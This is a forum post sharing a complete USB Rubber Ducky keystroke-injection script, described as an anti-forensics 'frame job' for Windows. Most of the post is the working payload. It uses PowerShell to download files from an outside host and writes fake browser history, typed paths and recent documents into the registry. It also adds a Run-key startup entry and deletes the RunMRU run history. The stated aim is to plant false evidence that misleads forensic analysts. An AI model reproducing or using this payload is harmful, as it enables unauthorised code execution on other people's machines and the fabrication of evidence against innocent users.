br0k3nilluzion Posted November 25, 2013 Share Posted November 25, 2013 Found this while studying. Interesting.. Hope you guys like it. http://www.informationwarfarecenter.com/Cyber-Secrets.html http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt REM Calling this the rubber ducky frame job. This adds fake information into Windows Registry areas forensicREM analysts use to track internet usage.REM Author: Jeremy Martin - jeremy@informationwarfarecenter.comREM Class: Anti ForensicsREM version 0.1.3DELAY 1000GUI rDELAY 1000REM Download a file and save it into the temp folderSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/CIR/CIR.pdf','%TEMP%\latest-CIR.pdf')ENTERDELAY 1000GUI rDELAY 1000Download a graphic and save it to tempSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/back.jpg','%TEMP%\back.jpg')ENTERDELAY 1000GUI rDELAY 1000REM Open Intenet Explorer and generate trafficSTRING iexplore.exe http://www.informationwarfarecenter.com/index-4.htmlDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url1 /d http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url3 /d http://www.i-never-went-here-again.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url4 /d http://www.i-just-faked-the-url-address.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Document HistorySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /v 0 /d fake-data /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Add a startup link for a previously downloaded file. Malware uses this quite often.STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Changes the background to the previously downloaded graphicSTRING REG ADD "HKCU\Control Panel\Desktop" /v Wallpaper /d %TEMP%\back.jpg /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Opens a previously downloaded fileSTRING powershell Start-Process "%TEMP%\latest-CIR.pdf"ENTERDELAY 1500GUI rDELAY 1000REM Removes evidence of previous entriesSTRING REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Add another fake evidence entrySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /d "iexplore www.informationwarfarecenter.com/files/BGIU.zip" /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Opens a previously downloaded graphicSTRING %TEMP%/back.jpgDELAY 1000ENTERDELAY 1000 Quote Link to comment Share on other sites More sharing options...
br0k3nilluzion Posted November 25, 2013 Author Share Posted November 25, 2013 A youtube video of it in action as well Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.